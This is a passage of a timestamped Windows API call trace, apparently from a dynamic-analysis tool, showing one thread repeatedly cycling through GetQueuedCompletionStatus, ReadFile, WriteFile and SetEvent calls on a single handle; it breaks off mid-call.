[0081.526] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0081.526] GetCurrentThreadId () returned 0x5b0 [0081.526] SetEvent (hEvent=0x244) returned 1 [0081.526] GetCurrentThreadId () returned 0x5b0 [0081.526] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0081.526] GetLastError () returned 0x3e5 [0081.526] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0081.527] GetCurrentThreadId () returned 0x5b0 [0081.527] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0081.527] SetEvent (hEvent=0x2bc) returned 1 [0081.527] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0081.527] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0081.528] SetEvent (hEvent=0x25c) returned 1 [0081.528] GetCurrentThreadId () returned 0x5b0 [0081.528] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0081.528] GetLastError () returned 0x3e5 [0081.528] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.462] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0082.462] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.462] GetCurrentThreadId () returned 0x5b0 [0082.462] SetEvent (hEvent=0x244) returned 1 [0082.462] GetCurrentThreadId () returned 0x5b0 [0082.462] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.462] GetLastError () returned 0x3e5 [0082.462] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.464] GetCurrentThreadId () returned 0x5b0 [0082.464] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0082.464] SetEvent (hEvent=0x2bc) returned 1 [0082.464] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.464] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.465] SetEvent (hEvent=0x25c) returned 1 [0082.465] GetCurrentThreadId () returned 0x5b0 [0082.465] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.465] GetLastError () returned 0x3e5 [0082.465] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.696] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0082.696] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.696] GetCurrentThreadId () returned 0x5b0 [0082.696] SetEvent (hEvent=0x244) returned 1 [0082.696] GetCurrentThreadId () returned 0x5b0 [0082.696] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.696] GetLastError () returned 0x3e5 [0082.696] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.698] GetCurrentThreadId () returned 0x5b0 [0082.698] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0082.698] SetEvent (hEvent=0x2bc) returned 1 [0082.698] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.698] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.699] SetEvent (hEvent=0x25c) returned 1 [0082.699] GetCurrentThreadId () returned 0x5b0 [0082.699] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.699] GetLastError () returned 0x3e5 [0082.699] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.931] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0082.931] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.931] GetCurrentThreadId () returned 0x5b0 [0082.931] SetEvent (hEvent=0x244) returned 1 [0082.931] GetCurrentThreadId () returned 0x5b0 [0082.931] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.931] GetLastError () returned 0x3e5 [0082.931] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.932] GetCurrentThreadId () returned 0x5b0 [0082.932] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0082.932] SetEvent (hEvent=0x2bc) returned 1 [0082.932] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.932] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0082.933] SetEvent (hEvent=0x25c) returned 1 [0082.933] GetCurrentThreadId () returned 0x5b0 [0082.933] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0082.933] GetLastError () returned 0x3e5 [0082.933] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.165] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0083.165] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.165] GetCurrentThreadId () returned 0x5b0 [0083.165] SetEvent (hEvent=0x244) returned 1 [0083.165] GetCurrentThreadId () returned 0x5b0 [0083.165] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.165] GetLastError () returned 0x3e5 [0083.165] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.166] GetCurrentThreadId () returned 0x5b0 [0083.166] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0083.166] SetEvent (hEvent=0x2bc) returned 1 [0083.166] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.166] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.167] SetEvent (hEvent=0x25c) returned 1 [0083.167] GetCurrentThreadId () returned 0x5b0 [0083.167] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.167] GetLastError () returned 0x3e5 [0083.167] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.460] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0083.460] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.460] GetCurrentThreadId () returned 0x5b0 [0083.460] SetEvent (hEvent=0x244) returned 1 [0083.460] GetCurrentThreadId () returned 0x5b0 [0083.460] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.460] GetLastError () returned 0x3e5 [0083.460] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.461] GetCurrentThreadId () returned 0x5b0 [0083.461] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0083.461] SetEvent (hEvent=0x2bc) returned 1 [0083.461] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.461] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.462] SetEvent (hEvent=0x25c) returned 1 [0083.462] GetCurrentThreadId () returned 0x5b0 [0083.462] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.462] GetLastError () returned 0x3e5 [0083.462] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.693] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0083.693] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.693] GetCurrentThreadId () returned 0x5b0 [0083.694] SetEvent (hEvent=0x244) returned 1 [0083.694] GetCurrentThreadId () returned 0x5b0 [0083.694] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.694] GetLastError () returned 0x3e5 [0083.694] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.695] GetCurrentThreadId () returned 0x5b0 [0083.695] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0083.695] SetEvent (hEvent=0x2bc) returned 1 [0083.695] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.695] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.696] SetEvent (hEvent=0x25c) returned 1 [0083.696] GetCurrentThreadId () returned 0x5b0 [0083.696] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.696] GetLastError () returned 0x3e5 [0083.696] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.928] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0083.928] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.928] GetCurrentThreadId () returned 0x5b0 [0083.928] SetEvent (hEvent=0x244) returned 1 [0083.928] GetCurrentThreadId () returned 0x5b0 [0083.928] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.929] GetLastError () returned 0x3e5 [0083.929] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.929] GetCurrentThreadId () returned 0x5b0 [0083.929] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0083.929] SetEvent (hEvent=0x2bc) returned 1 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0083.930] SetEvent (hEvent=0x25c) returned 1 [0083.930] GetCurrentThreadId () returned 0x5b0 [0083.930] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0083.930] GetLastError () returned 0x3e5 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.163] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0084.163] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.163] GetCurrentThreadId () returned 0x5b0 [0084.163] SetEvent (hEvent=0x244) returned 1 [0084.163] GetCurrentThreadId () returned 0x5b0 [0084.163] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.163] GetLastError () returned 0x3e5 [0084.163] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.164] GetCurrentThreadId () returned 0x5b0 [0084.164] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0084.164] SetEvent (hEvent=0x2bc) returned 1 [0084.164] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.164] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.166] SetEvent (hEvent=0x25c) returned 1 [0084.166] GetCurrentThreadId () returned 0x5b0 [0084.166] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.166] GetLastError () returned 0x3e5 [0084.166] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.397] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0084.397] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.397] GetCurrentThreadId () returned 0x5b0 [0084.397] SetEvent (hEvent=0x244) returned 1 [0084.398] GetCurrentThreadId () returned 0x5b0 [0084.398] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.398] GetLastError () returned 0x3e5 [0084.398] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.399] GetCurrentThreadId () returned 0x5b0 [0084.399] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, 